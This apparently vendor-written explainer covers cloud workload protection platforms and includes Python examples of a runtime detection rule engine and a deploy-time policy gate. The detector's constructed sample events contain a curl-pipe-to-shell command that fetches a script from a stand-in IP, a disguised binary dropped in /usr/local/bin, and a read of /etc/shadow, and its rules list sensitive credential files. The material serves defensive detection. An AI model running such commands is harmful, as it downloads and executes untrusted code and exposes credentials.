What is a Cloud Workload Protection Platform (CWPP)?


A cloud workload protection platform (CWPP) is an automated, real-time security solution that protects workloads running on on-premises, public cloud, and hybrid infrastructure, including those running in containerized and virtualized environments. A CWPP is focused on securing cloud workloads, which include virtual machines, containers, serverless functions, and any other form of compute running in the cloud. Cloud workload protection is a key component of cloud-native security, as a CWPP provides protections inside the workload itself that separate it from cloud security posture management (CSPM) and other security tools.

What You Will Learn

Learn what a cloud workload protection platform (CWPP) is and how it protects workloads running in the cloud, including containers.

  • What a Cloud Workload Protection Platform (CWPP) is

  • How a CWPP works and what features to look for

  • Best practices, and how CWPP differs from the rest of the acronym soup

Introduction to CWPP

A cloud workload refers to the computing resources and tasks that are required to run an application or service in a cloud computing environment. Cloud workloads are often run on virtual machines provided by cloud hosting companies, but they can also be run in containers, as part of a microservices-based architecture, and as serverless functions that run in managed environments. Many businesses choose to run different workloads on different cloud providers to optimize performance and costs.

Cloud workloads can refer to anything that runs in the cloud, for example:

  • Static workloads such as databases that are always online as part of an application backend.
  • Short-lived, ephemeral workloads that execute actions such as generating PDFs and sending emails, and are only executed when called.
  • Scheduled processes that run periodically, such as processing batches of tasks or cleaning up data at regular intervals.

A cloud workload protection platform protects workloads by actively scanning them for vulnerabilities prior to deployment, and by providing ongoing runtime protection to address emerging threats.

Why is cloud workload protection important?

As cloud workloads often have access to sensitive or proprietary data, and may be connected to other critical IT infrastructure, strong security measures should be taken to secure them.

Due to the highly varied nature of cloud-native applications, a CWPP must be able to protect workloads running in public cloud-hosted containers, Kubernetes, virtual machines, and serverless functions. These may span different cloud providers, as well as on-premises infrastructure in hybrid hosting environments.

How does CWPP work?

A CWPP provides visibility and inventory tools for cataloging workloads, and information on where and when they are running, so that security teams are fully aware of what they are responsible for.

Once the security landscape is understood, a CWPP provides end-to-end coverage of cloud workloads with:

  • Vulnerability management: CWPPs scan the code, container images, and configuration used in workloads for known vulnerabilities, including those in software dependencies, and report which findings have a fix available.
  • Runtime protection: Running processes are monitored for signs of an attack in progress, such as unexpected shells, writes to binary directories, or reads of credential files. Because this is based on behavior rather than signatures, it helps protect against zero-day exploits and attacks targeted at your specific workloads and code.
  • Auditing and reporting: Detailed logging provides historical insight and can be used to identify suspicious activity and data misuse retroactively, so that the relevant parties can be notified and action can be taken.
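As an added illustration of the runtime protection point above (this is example code written for this article, not Sysdig's or any product's own detection engine), the following applies a few behavioral rules to a stream of process and file events of the kind a syscall-level agent would emit. The JSON event format, the rule thresholds, and the shell-parent allowlist are assumptions for the example; the sample events are constructed, not captured from a real system.

```python
import json

# Process names treated as interactive shells.
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
# Parents assumed to legitimately spawn shells; tune this per workload.
SHELL_PARENT_ALLOWLIST = {"sh", "bash", "sshd", "supervisord", "entrypoint.sh"}
BINARY_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")
SENSITIVE_FILES = {"/etc/shadow", "/etc/sudoers", "/root/.ssh/id_rsa"}
DOWNLOADERS = {"curl", "wget"}
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


def rule_shell_in_container(ev):
    # A web server or runtime spawning a shell is a classic post-exploitation sign.
    if ev["type"] == "exec" and ev["proc"] in SHELLS and ev["pproc"] not in SHELL_PARENT_ALLOWLIST:
        return "shell_in_container", "high", f"{ev['pproc']} spawned: {ev['cmdline']}"


def rule_downloader_in_container(ev):
    # Production images rarely need curl/wget at runtime; miners and droppers do.
    if ev["type"] == "exec" and ev["proc"] in DOWNLOADERS:
        return "downloader_in_container", "medium", ev["cmdline"]


def rule_write_below_binary_dir(ev):
    # A container's binaries should not change after the image is built.
    if ev["type"] == "open" and "w" in ev.get("flags", "") and ev.get("path", "").startswith(BINARY_DIRS):
        return "write_below_binary_dir", "critical", f"{ev['proc']} wrote {ev['path']}"


def rule_sensitive_file_read(ev):
    if ev["type"] == "open" and ev.get("path") in SENSITIVE_FILES:
        return "sensitive_file_read", "high", f"{ev['proc']} (user {ev['user']}) opened {ev['path']}"


RULES = [rule_shell_in_container, rule_downloader_in_container,
         rule_write_below_binary_dir, rule_sensitive_file_read]


def detect(lines):
    """Evaluate every rule against every event line; return findings in event order."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                name, severity, detail = hit
                findings.append({"ts": ev["ts"], "container": ev["container"], "image": ev["image"],
                                 "rule": name, "severity": severity, "detail": detail})
    return findings


def containers_to_isolate(findings, min_severity="high"):
    """Containers with a finding at or above min_severity: candidates for automated response."""
    floor = SEVERITY_RANK[min_severity]
    return {f["container"] for f in findings if SEVERITY_RANK[f["severity"]] >= floor}


# Constructed sample events (one JSON object per line). Not real captured data.
SAMPLE_EVENTS = [
    '{"ts":"2024-05-01T10:00:01Z","type":"exec","container":"c1","image":"shop/api:1.4","user":"www-data","proc":"node","pproc":"npm","cmdline":"node server.js"}',
    '{"ts":"2024-05-01T10:07:12Z","type":"exec","container":"c1","image":"shop/api:1.4","user":"www-data","proc":"sh","pproc":"node","cmdline":"sh -c curl -s http://198.51.100.7/x.sh | sh"}',
    '{"ts":"2024-05-01T10:07:12Z","type":"exec","container":"c1","image":"shop/api:1.4","user":"www-data","proc":"curl","pproc":"sh","cmdline":"curl -s http://198.51.100.7/x.sh"}',
    '{"ts":"2024-05-01T10:07:13Z","type":"open","container":"c1","image":"shop/api:1.4","user":"www-data","proc":"sh","path":"/usr/local/bin/kworker","flags":"wc"}',
    '{"ts":"2024-05-01T10:09:40Z","type":"open","container":"c2","image":"shop/worker:2.0","user":"app","proc":"cat","path":"/etc/shadow","flags":"r"}',
    '{"ts":"2024-05-01T10:10:02Z","type":"exec","container":"c3","image":"ops/bastion:1.0","user":"ops","proc":"bash","pproc":"sshd","cmdline":"-bash"}',
    '{"ts":"2024-05-01T10:10:05Z","type":"open","container":"c1","image":"shop/api:1.4","user":"www-data","proc":"node","path":"/app/config.json","flags":"r"}',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['severity']:8} {f['container']} {f['rule']}: {f['detail']}")
    print("isolate:", sorted(containers_to_isolate(detect(SAMPLE_EVENTS))))
```

The benign events (the server starting, an operator's SSH session, a config read) produce nothing, while the download-and-run chain in container c1 fires three rules in sequence; that chaining, rather than any single event, is what makes behavioral runtime detection useful against an exploit no signature yet covers.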

Cloud workload protection takes place inside the execution environment (the container, virtual machine, or function), rather than by monitoring the cloud platform and its configuration; that is the job of posture management tools.

CWPP features

Different CWPP products provide their own specific features. When choosing a CWPP to protect your cloud workloads, assess if you require the following:

  • Integration with your existing tools and platforms: CI/CD integration ensures that you can identify known vulnerabilities at the build stage, so they do not make it to production.
  • Automation: Automated detection and response drastically shortens the window an attacker has to fully exploit a successful intrusion, and gives your security team time to respond to complex attacks in progress.
  • Policy enforcement: Your CWPP should be able to enforce security policies rather than only report violations, for example by refusing to deploy images from unapproved registries or with unpatched critical vulnerabilities, and by blocking privileged containers or processes that break a runtime rule.
  • Compliance monitoring: GDPR, CCPA, and other legal frameworks require the protection of users' personally identifiable information (PII). If you handle this kind of data, your CWPP should monitor access to it and alert on suspected breaches, so that stakeholders can be informed and costly violations can be avoided.
  • Firewall and segmentation: If you have a complex deployment, your CWPP should assist in isolating cloud workloads from sensitive resources. Network segmentation limits an attacker's ability to move laterally through your network after compromising one workload.
  • Agentless scanning: Removing the need to install CWPP agents for each workload makes deployment and maintenance simpler, while also improving scalability. Note the trade-off: agentless approaches inspect snapshots of disks, images, and configuration, so they cover inventory and vulnerability scanning well but cannot observe process behavior as it happens. Runtime protection still needs an agent or kernel-level instrumentation on the workload.
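To make the vulnerability management and policy enforcement features concrete, here is an added example of a deploy-time gate of the kind a CWPP runs in a CI/CD pipeline or as a Kubernetes admission check. It is illustrative code written for this article, not a CWPP product's API: the policy values, the approved registry, the pod-spec fields it reads (a subset of a Kubernetes pod spec), and the scanner findings (with made-up identifiers VULN-1 to VULN-3 and hypothetical package names, not real CVEs) are all assumptions.

```python
SEVERITY_RANK = {"negligible": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

# Policy values are assumptions for the example; a real gate reads them from config.
DEFAULT_POLICY = {
    "approved_registries": ("registry.example.com/",),
    "block_fixable_severity": "high",      # block when a fix exists at this severity or above
    "block_unfixed_severity": "critical",  # block even with no fix at this severity or above
}


def image_tag(image):
    """Tag part of an image reference, or '' if none (a ':' in the registry port is ignored)."""
    last_slash = image.rfind("/")
    last_colon = image.rfind(":")
    return image[last_colon + 1:] if last_colon > last_slash else ""


def image_violations(image, policy):
    v = []
    if not image.startswith(policy["approved_registries"]):
        v.append(f"{image}: not from an approved registry")
    if "@sha256:" not in image and image_tag(image) in ("", "latest"):
        v.append(f"{image}: mutable tag, pin a version or digest")
    return v


def pod_violations(spec):
    # Sharing host namespaces defeats the isolation the container is supposed to provide.
    return [f"pod: {field} is enabled" for field in ("hostPID", "hostNetwork", "hostIPC") if spec.get(field)]


def container_violations(c):
    name, sc, v = c["name"], c.get("securityContext", {}), []
    if sc.get("privileged"):
        v.append(f"{name}: privileged container")
    if sc.get("allowPrivilegeEscalation", True):   # Kubernetes defaults this to true
        v.append(f"{name}: allowPrivilegeEscalation is not false")
    if not sc.get("runAsNonRoot"):
        v.append(f"{name}: runAsNonRoot is not true")
    if not sc.get("readOnlyRootFilesystem"):
        v.append(f"{name}: root filesystem is writable")
    return v


def vulnerability_violations(image, findings, policy):
    v = []
    for f in findings:
        fixable = bool(f.get("fixed_in"))
        threshold = policy["block_fixable_severity"] if fixable else policy["block_unfixed_severity"]
        if SEVERITY_RANK[f["severity"]] >= SEVERITY_RANK[threshold]:
            fix = f"fix in {f['fixed_in']}" if fixable else "no fix available"
            v.append(f"{image}: {f['id']} ({f['severity']}) in {f['package']} {f['version']}, {fix}")
    return v


def evaluate(spec, scan_results, policy=DEFAULT_POLICY):
    """Return (allowed, violations) for a pod spec plus per-image scanner findings."""
    violations = pod_violations(spec)
    for c in spec["containers"]:
        violations += image_violations(c["image"], policy)
        violations += container_violations(c)
        violations += vulnerability_violations(c["image"], scan_results.get(c["image"], []), policy)
    return (not violations, violations)


# Constructed sample input: one hardened container and one sloppy sidecar.
SAMPLE_POD = {
    "hostPID": True,
    "containers": [
        {"name": "api", "image": "registry.example.com/shop/api:1.4.2",
         "securityContext": {"runAsNonRoot": True, "allowPrivilegeEscalation": False,
                             "readOnlyRootFilesystem": True}},
        {"name": "sidecar", "image": "docker.io/library/busybox:latest",
         "securityContext": {"privileged": True}},
    ],
}
# Constructed scanner output; identifiers and packages are hypothetical, not real CVEs.
SAMPLE_SCAN = {
    "registry.example.com/shop/api:1.4.2": [
        {"id": "VULN-1", "severity": "high", "package": "libwidget", "version": "2.1.0", "fixed_in": "2.1.4"},
        {"id": "VULN-2", "severity": "medium", "package": "libacme", "version": "0.9.2", "fixed_in": "0.9.3"},
        {"id": "VULN-3", "severity": "critical", "package": "libfoo", "version": "1.0.0", "fixed_in": None},
    ],
    "docker.io/library/busybox:latest": [],
}
HARDENED_POD = {"containers": [SAMPLE_POD["containers"][0] | {"image": "registry.example.com/shop/api:1.4.3"}]}

if __name__ == "__main__":
    allowed, problems = evaluate(SAMPLE_POD, SAMPLE_SCAN)
    print("allowed" if allowed else "denied")
    for p in problems:
        print(" -", p)
```

The gate treats fixable and unfixable findings differently on purpose: blocking a deploy on a critical finding with no available fix stops the release without giving the team anything to do, so the threshold for unfixed findings is set higher. VULN-2 passes because medium findings with a fix are left to normal patch cadence under this policy.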

CWPP benefits

Vulnerabilities are often introduced to your environment through third-party packages. By exploiting such a vulnerability to run their own code inside a cloud workload, attackers can take over your cloud resources and run them at your expense, for example for cryptomining. By protecting your workloads with a CWPP you can prevent them from being exploited, or prevent them from becoming a stepping stone to your other cloud and on-premises infrastructure.

Visibility and reporting means that stakeholders are aware of the security risks that static and dynamic workloads present, and are alerted when suspicious activity is detected.

Legal compliance is also addressed, as CWPPs help protect sensitive data and alert security teams to potential unauthorized access or leaks, so that the attack vector can be closed and affected parties can be notified. This matters given the growing number of data protection laws worldwide, and the legal and reputational damage suffered by organizations that fall victim to data breaches.

Combining traditional cybersecurity products to try to provide full cloud coverage is impractical: the complexity and uniqueness of cloud workloads and the infrastructure they run on require security processes and technologies designed for the cloud so that no gaps are left.

CWPP vs. CSPM

Cloud security posture management (CSPM) plays a critical role in cloud native environments.

While a CWPP provides protection within running workloads, a CSPM provides overall oversight and protection of your cloud infrastructure. A CSPM scans for misconfigurations of the cloud platforms that workloads run on, checks security policies and permissions, and identifies risks specific to cloud environments such as AWS, Google Cloud, and Azure. CSPM tools are typically preventive in nature, ensuring secure cloud configurations, while CWPP tools offer a mix of prevention and detection for workloads.

CWPP vs. CNAPP

A cloud native application protection platform (CNAPP) differs from a CWPP in both role and scope: a CNAPP integrates multiple cloud security technologies into a unified platform, often including CWPP and CSPM features.

Cloud workload protection best practices

In addition to deploying a security solution that provides CWPP features, there are several policies and procedures you should enact to protect your cloud workloads:

  • Make security a priority during development: In addition to integrating vulnerability scanning in your CI/CD pipelines, perform code reviews and static/dynamic code analysis with a focus on reducing the potential attack vectors exposed by your workloads.
  • Regularly review and update security policies: A CWPP can assist in enforcing security policies, but it cannot understand their implications. Make sure you review them regularly.
  • Routinely run and revise incident response drills: Time is of the essence when responding to cybersecurity incidents. You should run regular drills to ensure that your CWPP is being leveraged to its full effect, and that there are no gaps in visibility or your response plan. This helps you fully assess the impact of a security incident and take remediation steps in a timely manner.

A CWPP is only effective if you pay attention to it. You should also regularly check your CWPP for alerts, including newly disclosed vulnerabilities affecting deployed images, configuration drift, and attempted privilege escalation or unexpected access attempts.

Full cloud workload protection

In production, workloads must be monitored and protected from both inside their execution environment, and from the outside, including the cloud infrastructure and configuration that host them. A standalone cloud workload protection platform does not provide comprehensive coverage for cloud native environments, and must be combined with security posture management solutions and other integrations for complete visibility and proactive detection and response.

Many organizations are moving towards full end-to-end protection with a CNAPP that combines the features of both a CWPP and CSPM solution. Sysdig provides a complete cloud security platform that hardens your applications to close attack vectors, as well as monitors the execution of workloads for automatic response and remediation. Sysdig provides unique visibility of containers and Kubernetes, giving users the context they need to identify the most impactful vulnerabilities and detect workload threats instantly.